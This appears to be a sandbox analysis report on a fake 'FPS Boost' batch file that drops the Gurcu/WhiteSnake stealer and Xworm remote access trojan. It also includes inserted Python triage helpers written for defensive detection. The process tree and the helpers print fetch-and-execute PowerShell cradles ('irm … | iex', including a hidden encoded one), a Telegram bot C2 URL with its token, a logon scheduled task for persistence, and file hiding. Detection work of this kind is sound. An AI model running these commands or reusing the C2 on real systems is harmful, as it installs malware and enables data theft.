Analysis

  • max time kernel
    93s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-10-2024 12:45

General

  • Target

    FPS Boost 1.bat.zip

  • Size

    4KB

  • MD5

    f606e366fe37903c4c0371dac16605de

  • SHA1

    826e9869acc36c9f5befd821b57282720ffb4113

  • SHA256

    a2ff096d30c78db38eaddf0629b7f26ce36b64588a2ae05b7b9c2a7e9fbe2c05

  • SHA512

    a2cfa60e7aec6ccd4a361443d5f66d74dd7cd90bd9f0d1c5b4fda7a363988b180b645a55eec56efaea19379dfb9bceafc5d36b7b49332677c4330095bcae7555

  • SSDEEP

    96:d1ASURY4tkC2avn9d45zF4mc52F3UFW2dGpxzx9p+7tex3v:vUR7SC2abyc52FEFPURowx3v

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7278641970:AAEHOVYteJH3T-Bg5zEPMUSj6sdFforQUZw/sendMessag

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu (also tracked as WhiteSnake) is an information stealer written in C#.

  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

    Runs PowerShell with its display window hidden.

  • Drops file in Drivers directory 1 IoCs
  • Enumerates connected drives 3 TTPs 14 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies registry class 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
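The process tree below records the three things an analyst wants to confirm first for this sample: an `irm ... | iex` download cradle, a second PowerShell launched with a hidden window and an `-e` (EncodedCommand) argument, and persistence through a logon scheduled task followed by `attrib +h`. The Python below is an added triage helper, not part of this report or of the sample: it tokenizes the command lines quoted from the tree, decodes the `-e` payload (base64 of UTF-16LE, the encoding PowerShell uses for EncodedCommand), and flags those patterns. The flag names, the heuristics and the final benign line are this example's own choices; the decoded text is whatever the page's base64 argument decodes to.

```python
import base64
import binascii
import re

# Command lines copied verbatim from the process tree in this report; the last
# one is a constructed benign line to show the checks stay quiet on ordinary use.
SAMPLE_COMMAND_LINES = [
    'powershell -NoProfile -ExecutionPolicy Bypass "irm https://rentry.co/damnitlol/raw | iex"',
    'schtasks /create /tn "Windows updater" /tr "C:\\Users\\Public\\dwn.bat" /sc ONLOGON /ru Admin /f',
    'attrib +h "C:\\Users\\Public\\dwn.bat"',
    'PoWeRsHeLL -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -e "aQByAG0AIABoAHQAdABwAHMAOgAvAC8AbQByAHAAZQBwAGUALgBwAHkAdABoAG8AbgBhAG4AeQB3AGgAZQByAGUALgBjAG8AbQAvAGEAcABpAC8AdgAxAC8AdgBpAGUAdwAvAGMAbABlAGEAbgBlAHIAIAB8ACAAaQBlAHgA"',
    'powershell -NoProfile -Command "Get-Process | Sort-Object CPU -Descending"',  # constructed, benign
]

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')
_CRADLE_RE = re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
_IEX_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
_HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden\b", re.I)          # -w / -WindowStyle Hidden
_BYPASS_RE = re.compile(r"-(ex[a-z]*|ep)\s+(bypass|unrestricted)\b", re.I)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted strings whole."""
    return [t.strip('"') for t in _TOKEN_RE.findall(cmdline)]


def is_encoded_switch(token):
    """True for -e, -ec, -enc ... -EncodedCommand: PowerShell accepts any unique prefix."""
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return bool(name) and (name == "ec" or "encodedcommand".startswith(name))


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    tokens = tokenize(cmdline)
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_switch(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def triage(cmdline):
    """Classify one command line; the flag names are this example's own vocabulary."""
    tokens = tokenize(cmdline)
    exe = tokens[0].rsplit("\\", 1)[-1]          # drop any directory prefix
    program = exe.lower()
    if program.endswith(".exe"):
        program = program[:-4]
    decoded = decode_encoded_command(cmdline)
    # Cradle checks run over the decoded payload too, so -e does not hide irm|iex.
    effective = cmdline if decoded is None else cmdline + " " + decoded
    lowered = [t.lower() for t in tokens]
    flags = []
    if program == "powershell":
        if decoded is not None:
            flags.append("encoded_command")
        # Random casing such as PoWeRsHeLL defeats naive string matching; normal spellings pass.
        if exe not in (exe.lower(), exe.upper(), "PowerShell", "PowerShell.exe"):
            flags.append("powershell_mixed_case")
        if _HIDDEN_RE.search(cmdline):
            flags.append("hidden_window")
        if _BYPASS_RE.search(cmdline):
            flags.append("execution_policy_bypass")
        if _CRADLE_RE.search(effective) and _IEX_RE.search(effective):
            flags.append("download_cradle")
    elif program == "schtasks" and "/create" in lowered:
        if "/sc" in lowered:
            i = lowered.index("/sc")
            if i + 1 < len(lowered) and lowered[i + 1] in ("onlogon", "onstart"):
                flags.append("logon_persistence")
    elif program == "attrib" and "+h" in lowered:
        flags.append("hide_file")
    return {"program": program, "decoded": decoded, "flags": flags}


def triage_all(cmdlines):
    """Triage a list of command lines in order."""
    return [triage(c) for c in cmdlines]


if __name__ == "__main__":
    for result in triage_all(SAMPLE_COMMAND_LINES):
        print(result["program"], result["flags"], result["decoded"] or "")
```

The decoded `-e` payload is a second `irm ... | iex` cradle, which is why the cradle check is run over the decoded text as well as the raw line; without that step a detection keyed only on the literal command line sees nothing but `PoWeRsHeLL -WindowStyle Hidden ... -e`.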

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FPS Boost 1.bat.zip"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:5108
  • C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\FPS Boost 1.bat"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Windows\system32\mode.com
      mode 128,33
      2⤵
      PID:1376
    • C:\Windows\System32\reg.exe
      Reg.exe query "HKU\S-1-5-19\Environment"
      2⤵
      PID:4896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoProfile -ExecutionPolicy Bypass "irm https://rentry.co/damnitlol/raw | iex"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3360
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\dwn.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4056
        • C:\Windows\System32\timeout.exe
          timeout /t 1 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:400
        • C:\Windows\System32\schtasks.exe
          schtasks /create /tn "Windows updater" /tr "C:\Users\Public\dwn.bat" /sc ONLOGON /ru Admin /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1724
        • C:\Windows\System32\attrib.exe
          attrib +h "C:\Users\Public\dwn.bat"
          4⤵
          • Views/modifies file attributes
          PID:4504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PoWeRsHeLL -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -e "aQByAG0AIABoAHQAdABwAHMAOgAvAC8AbQByAHAAZQBwAGUALgBwAHkAdABoAG8AbgBhAG4AeQB3AGgAZQByAGUALgBjAG8AbQAvAGEAcABpAC8AdgAxAC8AdgBpAGUAdwAvAGMAbABlAGEAbgBlAHIAIAB8ACAAaQBlAHgA"
          4⤵
          • UAC bypass
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Drops file in Drivers directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4172
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %b in (1) do rem"
      2⤵
      PID:1484
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:2376
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Cleaner " nul
      2⤵
      PID:3084
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:4900
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 2 " nul
      2⤵
      PID:4416
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:1516
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Game Booster " nul
      2⤵
      PID:4692
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:4024
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 3 " nul
      2⤵
      PID:1472
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 7 " nul
      2⤵
      PID:4996
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:4780
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Debloat " nul
      2⤵
      PID:512
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
      2⤵
      PID:4392
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " Version 2.0 " nul
      2⤵
      PID:2680
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
      2⤵
      PID:1848
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:4184
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 1 " nul
      2⤵
      PID:1276
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:4192
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Cleaner " nul
      2⤵
      PID:4896
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:3088
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 2 " nul
      2⤵
      PID:872
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:2196
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Game Booster " nul
      2⤵
      PID:2208
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:4204
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 3 " nul
      2⤵
      PID:4520
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 7 " nul
      2⤵
      PID:4336
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:4592
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Debloat " nul
      2⤵
      PID:3276
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
      2⤵
      PID:4424
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name="javaw.exe" CALL setpriority "realtime"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4392
    • C:\Windows\System32\Wbem\WMIC.exe
      wmic process where name="svchost.exe" CALL setpriority "realtime"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4560
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " Version 2.0 " nul
      2⤵
      PID:3012
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
      2⤵
      PID:2928
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:1632
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 1 " nul
      2⤵
      PID:1676
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:4732
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Cleaner " nul
      2⤵
      PID:4792
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:5020
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 2 " nul
      2⤵
      PID:2820
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:2036
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Game Booster " nul
      2⤵
      PID:1492
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:4236
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 3 " nul
      2⤵
      PID:4072
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 7 " nul
      2⤵
      PID:2652
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:5056
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Debloat " nul
      2⤵
      PID:1276
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
      2⤵
      PID:3212
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " Version 2.0 " nul
      2⤵
      PID:5116
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
      2⤵
      PID:4228
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:1052
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 1 " nul
      2⤵
      PID:1688
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:3360
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Cleaner " nul
      2⤵
      PID:1460
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:8
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 2 " nul
      2⤵
      PID:4256
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:1216
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Game Booster " nul
      2⤵
      PID:4420
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:3236
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 3 " nul
      2⤵
      PID:5064
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 7 " nul
      2⤵
      PID:1736
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
      PID:2788
    • C:\Windows\System32\findstr.exe
      findstr /v /a:F /R "^$" " Debloat " nul
      2⤵
      PID:4124
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
      2⤵
      PID:2272
    • C:\Windows\System32\reg.exe
      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d "0" /f
      2⤵
      PID:3956
    • C:\Windows\System32\reg.exe
      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t REG_DWORD /d "0" /f
      2⤵
      PID:2676
    • C:\Windows\System32\reg.exe
      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableBoottrace" /t REG_DWORD /d "0" /f
      2⤵
      PID:1964
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " Version 2.0 " nul
      2⤵
      PID:2844
    • C:\Windows\System32\findstr.exe
      findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul
      2⤵
      PID:3632
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " [ " nul
      2⤵
      PID:1996
    • C:\Windows\System32\findstr.exe
      findstr /v /a:B /R "^$" " 1 " nul
      2⤵
      PID:3468
    • C:\Windows\System32\findstr.exe
      findstr /v /a:8 /R "^$" " ] " nul
      2⤵
                                                                                                                                                    PID:4056
                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                    findstr /v /a:F /R "^$" " Cleaner " nul
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1564
                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                      findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                      2⤵
                                                                                                                                                        PID:400
                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                        findstr /v /a:B /R "^$" " 2 " nul
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1572
                                                                                                                                                        • C:\Windows\System32\findstr.exe
                                                                                                                                                          findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                          2⤵
                                                                                                                                                            PID:1324
                                                                                                                                                          • C:\Windows\System32\findstr.exe
                                                                                                                                                            findstr /v /a:F /R "^$" " Game Booster " nul
                                                                                                                                                            2⤵
                                                                                                                                                              PID:3880
                                                                                                                                                            • C:\Windows\System32\findstr.exe
                                                                                                                                                              findstr /v /a:8 /R "^$" " [ " nul
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2776
                                                                                                                                                              • C:\Windows\System32\findstr.exe
                                                                                                                                                                findstr /v /a:B /R "^$" " 3 " nul
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2852
                                                                                                                                                                • C:\Windows\System32\findstr.exe
                                                                                                                                                                  findstr /v /a:B /R "^$" " 7 " nul
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2848
                                                                                                                                                                  • C:\Windows\System32\findstr.exe
                                                                                                                                                                    findstr /v /a:8 /R "^$" " ] " nul
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1676
                                                                                                                                                                    • C:\Windows\System32\findstr.exe
                                                                                                                                                                      findstr /v /a:F /R "^$" " Debloat " nul
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2112
                                                                                                                                                                      • C:\Windows\System32\findstr.exe
                                                                                                                                                                        findstr /v /a:8 /R "^$" " [ X to go Back ]" nul
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:100
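The run of findstr.exe children above is the batch-file "colour echo" trick, not a search: in its standard form the script creates a file whose name is the text to display (a cmd-internal redirection, so it leaves no process event), then runs `findstr /V /A:XX /R "^$" "<text>" nul`, and findstr prints that file name as a coloured prefix. The `/A` attribute uses the same hex digits as cmd's COLOR command (background digit, then foreground), so the sixteen calls spell out the lure's menu: "Version 2.0", a rule, entries 1 Cleaner, 2 Game Booster, 3/7 Debloat, and "X to go Back". The example below is added here and is not the sample's code: it decodes those command lines back into the rendered menu, pairs them with the reg.exe HKLM write and the Remove-AppxPackage burst, and returns the combination a detection would key on. The command lines are copied from this report (the PowerShell list is cut to four entries); the regexes, the threshold values and the reading of a single-digit `/A` value as foreground-on-black are my assumptions.

```python
"""Decode a cmd.exe child-process list: findstr /A colour-echo segments,
Get-AppxPackage | Remove-AppxPackage calls and reg add targets.
Added example; not code from the analysed sample."""
import re
from dataclasses import dataclass

# Command lines copied from this report's process tree, in order
# (PowerShell entries truncated to four of the many in the tree).
TREE = [
    r'Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableBoottrace" /t REG_DWORD /d "0" /f',
    r'findstr /v /a:08 /R "^$" " Version 2.0 " nul',
    r'findstr /v /a:08 /R "^$" " _________________________________________________________________________________" nul',
    r'findstr /v /a:8 /R "^$" " [ " nul',
    r'findstr /v /a:B /R "^$" " 1 " nul',
    r'findstr /v /a:8 /R "^$" " ] " nul',
    r'findstr /v /a:F /R "^$" " Cleaner " nul',
    r'findstr /v /a:8 /R "^$" " [ " nul',
    r'findstr /v /a:B /R "^$" " 2 " nul',
    r'findstr /v /a:8 /R "^$" " ] " nul',
    r'findstr /v /a:F /R "^$" " Game Booster " nul',
    r'findstr /v /a:8 /R "^$" " [ " nul',
    r'findstr /v /a:B /R "^$" " 3 " nul',
    r'findstr /v /a:B /R "^$" " 7 " nul',
    r'findstr /v /a:8 /R "^$" " ] " nul',
    r'findstr /v /a:F /R "^$" " Debloat " nul',
    r'findstr /v /a:8 /R "^$" " [ X to go Back ]" nul',
    r'PowerShell -Command "Get-AppxPackage *3DBuilder* | Remove-AppxPackage"',
    r'PowerShell -Command "Get-AppxPackage *Getstarted* | Remove-AppxPackage"',
    r'PowerShell -Command "Get-AppxPackage *bing* | Remove-AppxPackage"',
    r'PowerShell -Command "Get-AppxPackage *zune* | Remove-AppxPackage"',
]

# cmd.exe COLOR hex digits; findstr /A takes the same two-digit attribute.
CMD_COLOURS = {
    "0": "black", "1": "blue", "2": "green", "3": "aqua", "4": "red",
    "5": "purple", "6": "yellow", "7": "white", "8": "gray", "9": "light blue",
    "A": "light green", "B": "light aqua", "C": "light red",
    "D": "light purple", "E": "light yellow", "F": "bright white",
}

FINDSTR_ECHO = re.compile(
    r'^findstr\s+/v\s+/a:(?P<attr>[0-9a-f]{1,2})\s+/r\s+"\^\$"\s+"(?P<text>[^"]*)"\s+nul\s*$',
    re.IGNORECASE)
APPX_REMOVE = re.compile(
    r'Get-AppxPackage\s+(?P<pkg>[^\s|]+)\s*\|\s*Remove-AppxPackage', re.IGNORECASE)
REG_ADD = re.compile(r'^reg(?:\.exe)?\s+add\s+"?(?P<key>HK[A-Z_]+\\[^"]+)"?', re.IGNORECASE)


@dataclass(frozen=True)
class Segment:
    text: str
    fg: str
    bg: str


def decode_segment(cmdline):
    """Return the text and colours a findstr colour-echo call paints, else None."""
    m = FINDSTR_ECHO.match(cmdline.strip())
    if not m:
        return None
    attr = m.group("attr").upper()
    if len(attr) == 2:
        bg, fg = attr[0], attr[1]          # background digit, then foreground
    else:
        bg, fg = "0", attr                  # assumption: one digit = fg on black
    return Segment(m.group("text"), CMD_COLOURS[fg], CMD_COLOURS[bg])


def analyse(cmdlines, menu_min=5, appx_min=3):
    """Classify each child command line and flag the combination seen here.
    Thresholds are my choice, not a documented rule."""
    segments, removed, reg_keys = [], [], []
    for line in cmdlines:
        seg = decode_segment(line)
        if seg is not None:
            segments.append(seg)
            continue
        m = APPX_REMOVE.search(line)
        if m:
            removed.append(m.group("pkg"))
            continue
        m = REG_ADD.match(line.strip())
        if m:
            reg_keys.append(m.group("key"))
    findings = []
    if len(segments) >= menu_min:
        findings.append(f"colour-echo menu: {len(segments)} findstr /A segments")
    if len(removed) >= appx_min:
        findings.append(f"bulk Appx removal: {len(removed)} Remove-AppxPackage calls")
    hklm = [k for k in reg_keys if k.upper().startswith("HKLM\\")]
    if hklm:
        findings.append(f"HKLM write (needs elevation): {len(hklm)} reg add")
    return {"segments": segments, "removed": removed,
            "reg_keys": reg_keys, "findings": findings}


def render_menu(segments):
    """Join the painted fragments in order. Where the script broke lines is
    not recoverable from process events, so fragments are space-separated."""
    return " ".join(s.text.strip() for s in segments)


if __name__ == "__main__":
    result = analyse(TREE)
    print(render_menu(result["segments"]))
    for f in result["findings"]:
        print("finding:", f)
```

On its own a findstr-painted menu is what many hobbyist "tweak" batch files look like, and Remove-AppxPackage is exactly what a debloat script is expected to run; the lure does perform its advertised job. The reason to keep the heuristic is the pairing: the same cmd.exe also writes under HKLM\SYSTEM (which only succeeds elevated, consistent with the UAC-bypass signature in the header) and, per the signature list, launches hidden PowerShell. Feed real Sysmon event 1 or 4688 command lines for one parent PID into `analyse` and treat a hit on all three findings together as the alert, not any one of them.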
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *3DBuilder* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:1088
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Getstarted* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:3620
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsAlarms* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:2344
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsCamera* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:208
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *bing* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:2424
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *MicrosoftOfficeHub* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:828
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *OneNote* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:3476
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *people* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:4560
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsPhone* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:4732
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *solit* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:3572
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *WindowsSoundRecorder* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:1276
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *windowscommunicationsapps* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:2196
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *zune* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:4256
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *Sway* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:3604
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *CommsPhone* | Remove-AppxPackage"
  2⤵
  • Command and Scripting Interpreter: PowerShell
  • Suspicious behavior: EnumeratesProcesses
    PID:688
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell -Command "Get-AppxPackage *ConnectivityStore* | Remove-AppxPackage"
  2⤵
